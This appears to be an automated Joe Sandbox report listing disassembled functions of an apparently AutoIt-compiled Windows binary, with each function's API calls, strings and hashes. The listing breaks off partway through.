Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 68edd76b167b980c9fcb92b5d832e53d9d44bd4dad4b176c7328f39f6c210cb3
Instruction ID: 024f40e5f92c59aea5b7ff66138fb4f5ded33ee7105ebd5efa7a1f819e68f471
Opcode Fuzzy Hash: 68edd76b167b980c9fcb92b5d832e53d9d44bd4dad4b176c7328f39f6c210cb3
Instruction Fuzzy Hash: 75C1A171A0125AAFDF10CF99C884BAEB7F5FF48314F148469E915AB280E778AD44CB51

Function 007E97FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007E9851
VariantInit.OLEAUT32(?), ref: 007E9922
VariantInit.OLEAUT32(?), ref: 007E9A23
VariantClear.OLEAUT32(?), ref: 007E9A2D
VariantClear.OLEAUT32(?), ref: 007E9A8A

Strings

Incorrect Object type in FOR..IN loop, xrefs: 007E9A06
Null Object assignment in FOR..IN loop, xrefs: 007E98B2, 007E99E0, 007E9A98

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 8325569d312ec82d3847100381135e49fa5f532dbed5d7d997722164c64bdf0c
Instruction ID: 2f3f7609f6ee94e030cfdbea5fbf49b8c92a2071f67ae7bcea653ddf42f617ce
Opcode Fuzzy Hash: 8325569d312ec82d3847100381135e49fa5f532dbed5d7d997722164c64bdf0c
Instruction Fuzzy Hash: A191A372A01259ABCF24CF96C844F9EB7B8EF49714F10815DF615AB241D778A944CFA0

Function 007E9E47 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 007C7D28: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C7C62,80070057,?,?,?,007C8073), ref: 007C7D45
Part of subcall function 007C7D28: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C7C62,80070057,?,?), ref: 007C7D60
Part of subcall function 007C7D28: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C7C62,80070057,?,?), ref: 007C7D6E
Part of subcall function 007C7D28: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C7C62,80070057,?), ref: 007C7D7E

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 007E9EF0
_memset.LIBCMT ref: 007E9EFD
_memset.LIBCMT ref: 007EA040
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 007EA06C
CoTaskMemFree.OLE32(?), ref: 007EA077

Strings

NULL Pointer assignment, xrefs: 007EA0C5

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 309649e9c0f668b779df942587f94db3df639e1a8f5f50be232ad1c0fe43f0e8
Instruction ID: 32e9e797b426423b123a78f26b699212522653ac27235ed2b9d93ac72c0c8438
Opcode Fuzzy Hash: 309649e9c0f668b779df942587f94db3df639e1a8f5f50be232ad1c0fe43f0e8
Instruction Fuzzy Hash: CD913871D01229EBDB10DFA5D844EDEBBB9FF08310F10815AF519A7241EB75AA45CFA0

Function 007F73A5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007F7449
SendMessageW.USER32(?,00001036,00000000,?), ref: 007F745D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007F7477
_wcscat.LIBCMT ref: 007F74D2
SendMessageW.USER32(?,00001057,00000000,?), ref: 007F74E9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 007F7517

Strings

SysListView32, xrefs: 007F741B

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 3f4812be9bbcd736576518d9c9a3a46acdc20fd741a846e366213b5cd9ac517c
Instruction ID: f271f8ef8bc1472975a0a9aa3c3ccdaa37cae53d00aaadab30bf4a98ff196149
Opcode Fuzzy Hash: 3f4812be9bbcd736576518d9c9a3a46acdc20fd741a846e366213b5cd9ac517c
Instruction Fuzzy Hash: 0F41C370A0434CAFEB219F64CC85BFE77A9EF08350F10442AFA54E7291D6759D84DB60

Function 007EF01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 007D4148: CreateToolhelp32Snapshot.KERNEL32 ref: 007D416D
Part of subcall function 007D4148: Process32FirstW.KERNEL32(00000000,?), ref: 007D417B
Part of subcall function 007D4148: FindCloseChangeNotification.KERNEL32(00000000), ref: 007D4245

OpenProcess.KERNEL32(00000001,00000000,?), ref: 007EF08D
GetLastError.KERNEL32 ref: 007EF0A0
OpenProcess.KERNEL32(00000001,00000000,?), ref: 007EF0CF
TerminateProcess.KERNEL32(00000000,00000000), ref: 007EF14C
GetLastError.KERNEL32(00000000), ref: 007EF157
CloseHandle.KERNEL32(00000000), ref: 007EF18C

Strings

SeDebugPrivilege, xrefs: 007EF0AB

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 1701285019-2896544425
Opcode ID: db414b98e3e5d651b3bc4dbf15c0da08480bf225c21d7995bf2b32b0772f3d30
Instruction ID: 8c240dee3e668bda4c5af0c0f04af8e0d087ba133ea34205e3bf6200ebc0299e
Opcode Fuzzy Hash: db414b98e3e5d651b3bc4dbf15c0da08480bf225c21d7995bf2b32b0772f3d30
Instruction Fuzzy Hash: C0419A31301205DFDB25EF25CC99F6DB7A5AF88714F08841DF9469B292DB78A804CB96

Function 007D34DD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 007D357C

Strings

blank, xrefs: 007D34FE
info, xrefs: 007D351D
stop, xrefs: 007D354D
question, xrefs: 007D3535
warning, xrefs: 007D3565

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 3410e9f9c325f89cb968d374d0a1673faf84ef8882598a71385ac2be5642fb7e
Instruction ID: 289ce6bf725a244139e50981e13f8cd2be2cd188a72439f952d83cefa4a6f80b
Opcode Fuzzy Hash: 3410e9f9c325f89cb968d374d0a1673faf84ef8882598a71385ac2be5642fb7e
Instruction Fuzzy Hash: 4D113D71649756FEEB004A34FC82D6A77BCEF05360B20001BF91196381E7AC7F5046A6

Function 007D47E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 007D4802
LoadStringW.USER32(00000000), ref: 007D4809
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007D481F
LoadStringW.USER32(00000000), ref: 007D4826
_wprintf.LIBCMT ref: 007D484C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 007D486A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 007D4847

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 3ddc3374a0ebb4ac5c1b61b62cc15b1e22724e45b564789c60845b171ac0678e
Instruction ID: 8fc0ab0db6bb1e05cebd9b8b511c8e9658e10d7faa7dffa6fa9b888518631ab5
Opcode Fuzzy Hash: 3ddc3374a0ebb4ac5c1b61b62cc15b1e22724e45b564789c60845b171ac0678e
Instruction Fuzzy Hash: 7D012CF69003487BE75197A09D89FE7766CEB08300F400596B759E2141EA749E844F75

Function 007FDB04 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3

GetSystemMetrics.USER32(0000000F), ref: 007FDB42
GetSystemMetrics.USER32(0000000F), ref: 007FDB62
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 007FDD9D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 007FDDBB
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 007FDDDC
ShowWindow.USER32(00000003,00000000), ref: 007FDDFB
InvalidateRect.USER32(?,00000000,00000001), ref: 007FDE20
DefDlgProcW.USER32(?,00000005,?,?), ref: 007FDE43

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 9092991795688a3754f108a901988633ff8ce4e0696a1ee7a2a5d44b152b6d3c
Instruction ID: c27f601372e5b31d8248f159a96ebbc5abc9a36e19aa032a0681035f86cc2496
Opcode Fuzzy Hash: 9092991795688a3754f108a901988633ff8ce4e0696a1ee7a2a5d44b152b6d3c
Instruction Fuzzy Hash: E8B19C71600219EFDF24CF69C9897BD7BB2BF44701F088169EE489E255D739AD50CBA0

Function 007F0371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77

Part of subcall function 007F147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007F040D,?,?), ref: 007F1491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F044E

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper_memmove
String ID:
API String ID: 3479070676-0
Opcode ID: bc531d3b807c095fb5fe8f507ea0cf5088557211816e25fb7ea52019880726d0
Instruction ID: dd34bf8c5b18e8f72184cb7fd3c359d1cb03db42a2b2253fc9322018acc15c81
Opcode Fuzzy Hash: bc531d3b807c095fb5fe8f507ea0cf5088557211816e25fb7ea52019880726d0
Instruction Fuzzy Hash: B0A14870204205DFCB20EF24C885B7EB7E5AF84314F14891DF6969B392DB39A955CF92

Function 00772E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,007AC508,00000004,00000000,00000000,00000000), ref: 00772E9F
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,007AC508,00000004,00000000,00000000,00000000,000000FF), ref: 00772EE7
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,007AC508,00000004,00000000,00000000,00000000), ref: 007AC55B
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,007AC508,00000004,00000000,00000000,00000000), ref: 007AC5C7

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 496afa9d15a57d37437a2debf4bc9eca57062f6f98026c2387305b8bd57e209a
Instruction ID: c03f45f71f4f568d94fa82a84ff9c4dcc82bdb4abfe08221a52dcee99985cca6
Opcode Fuzzy Hash: 496afa9d15a57d37437a2debf4bc9eca57062f6f98026c2387305b8bd57e209a
Instruction Fuzzy Hash: 8941DB30604780AEDF764728888CB7A7B92BBD3340F28C51DF4AB46562C7BDE852DB15

Function 007D7681 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 007D7698

Part of subcall function 00790FE6: std::exception::exception.LIBCMT ref: 0079101C
Part of subcall function 00790FE6: __CxxThrowException@8.LIBCMT ref: 00791031

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 007D76CF
EnterCriticalSection.KERNEL32(?), ref: 007D76EB
_memmove.LIBCMT ref: 007D7739
_memmove.LIBCMT ref: 007D7756
LeaveCriticalSection.KERNEL32(?), ref: 007D7765
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007D777A
InterlockedExchange.KERNEL32(?,000001F6), ref: 007D7799

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: c5c5c707b160321bc04e80ab441093beac3b5f252e69b80b31273f5f5b824c01
Instruction ID: dc4ac910213afd3ef0e40e983d2bc4808ca3411ccaa925420397286992de07bc
Opcode Fuzzy Hash: c5c5c707b160321bc04e80ab441093beac3b5f252e69b80b31273f5f5b824c01
Instruction Fuzzy Hash: 5E315E71904209EFCF50EF64DC89EAEB778FF45710F1480A6F904AA256EB349A54DBA0

Function 007F67F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 007F6810
GetDC.USER32(00000000), ref: 007F6818
GetDeviceCaps.GDI32(00000000,0000005A), ref: 007F6823
ReleaseDC.USER32(00000000,00000000), ref: 007F682F
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007F686B
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007F687C
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,007F964F,?,?,000000FF,00000000,?,000000FF,?), ref: 007F68B6
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007F68D6

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 53fa6ba45f5a167d9f90261e617da4e151cd01d39584068f1075b3e8975376a3
Instruction ID: bdd9496d4d2feb8075cc181b8853fdb19a9fe17d2f6eb6d32272f9c85fd697b1
Opcode Fuzzy Hash: 53fa6ba45f5a167d9f90261e617da4e151cd01d39584068f1075b3e8975376a3
Instruction Fuzzy Hash: 4A316B72101614BFEB118F14CC8AFEA3BAEFF49761F044065FE089A291D67A9851CBB0

Function 007CC748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 007CC75D
_memcmp.LIBCMT ref: 007CC77F
_memcmp.LIBCMT ref: 007CC797
_memcmp.LIBCMT ref: 007CC7AA
_memcmp.LIBCMT ref: 007CC7C4
_memcmp.LIBCMT ref: 007CC7D7
_memcmp.LIBCMT ref: 007CC7EF
_memcmp.LIBCMT ref: 007CC80A

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 742f0ff45ff8c515f78aae37ef70cda36736a4b60207958a51f300cc917cfcf3
Instruction ID: 4fc1fdc9beda21869b0f43d2d57c285cb9ea978b3906c62ca27f1badaec21b8b
Opcode Fuzzy Hash: 742f0ff45ff8c515f78aae37ef70cda36736a4b60207958a51f300cc917cfcf3
Instruction Fuzzy Hash: 9121DA73A45106BAE606B5105D46FAB375CEE21754F08402CFD0AE6382EB1CDE21C6A1

Function 007DF166 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC

Part of subcall function 0078436A: _wcscpy.LIBCMT ref: 0078438D

_wcstok.LIBCMT ref: 007DF2D7
_wcscpy.LIBCMT ref: 007DF366
_memset.LIBCMT ref: 007DF399

Strings

X, xrefs: 007DF3D6

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 803cc413d866441c9d2af681652a8e1ddb9fcd910e6031db0678fdc2a9006022
Instruction ID: efc896a5d4a852f1cf381eec0b5cedd94cc120a723a34d56e0c2ce8ff457dde6
Opcode Fuzzy Hash: 803cc413d866441c9d2af681652a8e1ddb9fcd910e6031db0678fdc2a9006022
Instruction Fuzzy Hash: CCC17B71604341DFC714EF64D889A5AB7E4BF84350F40892EF89A973A2DB38EC45CB92

Function 007E71EE Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 007E72EB
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 007E730C
WSAGetLastError.WSOCK32(00000000), ref: 007E731F
htons.WSOCK32(?,?,?,00000000,?), ref: 007E73D5
inet_ntoa.WSOCK32(?), ref: 007E7392

Part of subcall function 007CB4EA: _strlen.LIBCMT ref: 007CB4F4
Part of subcall function 007CB4EA: _memmove.LIBCMT ref: 007CB516

_strlen.LIBCMT ref: 007E742F
_memmove.LIBCMT ref: 007E7498

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 466e45dffbecbda8e6399ca5a5ff8a71fc2251cc7097501b326e7e3b53fbf1d8
Instruction ID: 01eee5dc44c8f22c097ac5d2e9d29f3b06dfb4d3598cc16d35a4b01777694ff9
Opcode Fuzzy Hash: 466e45dffbecbda8e6399ca5a5ff8a71fc2251cc7097501b326e7e3b53fbf1d8
Instruction Fuzzy Hash: 5E81C171108280EBC714EB25DC8AF6AB7E8EF89714F14851CF5559B2D2EB78DD01CBA2

Function 00771800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9ed68bf357b021fd6aa1477029b92f1db550b56682a22e8d1788a4d28444578
Instruction ID: b7810d50231ee6a3a497255a6c06b8f448abfce2818169a24ccfb830368a627c
Opcode Fuzzy Hash: a9ed68bf357b021fd6aa1477029b92f1db550b56682a22e8d1788a4d28444578
Instruction Fuzzy Hash: CE714D30900209EFDF14CF58CC49AAEBB79FF86354F54C159F919AA251C738AA51CFA1

Function 007FB9C3 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01204CE8), ref: 007FBA5D
IsWindowEnabled.USER32(01204CE8), ref: 007FBA69
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 007FBB4D
SendMessageW.USER32(01204CE8,000000B0,?,?), ref: 007FBB84
IsDlgButtonChecked.USER32(?,?), ref: 007FBBC1
GetWindowLongW.USER32(01204CE8,000000EC), ref: 007FBBE3
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 007FBBFB

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
